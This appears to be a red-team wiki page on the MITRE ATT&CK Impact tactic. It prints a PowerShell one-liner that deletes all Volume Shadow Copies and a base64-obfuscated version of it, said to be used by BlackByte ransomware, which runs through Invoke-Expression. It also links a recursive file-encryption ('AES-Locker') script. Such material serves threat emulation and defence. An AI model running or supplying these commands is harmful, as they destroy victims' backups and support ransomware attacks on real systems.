Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/

Remove Volume Shadow Copies

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

The threat actor TTP is associated with BlackByte and executes the above as base64.

powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlA HQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAb wB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A CAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x

PowerShell Encryption Routine

A trivial example of encrypting files recursively with a random interger as the key

https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1

Last updated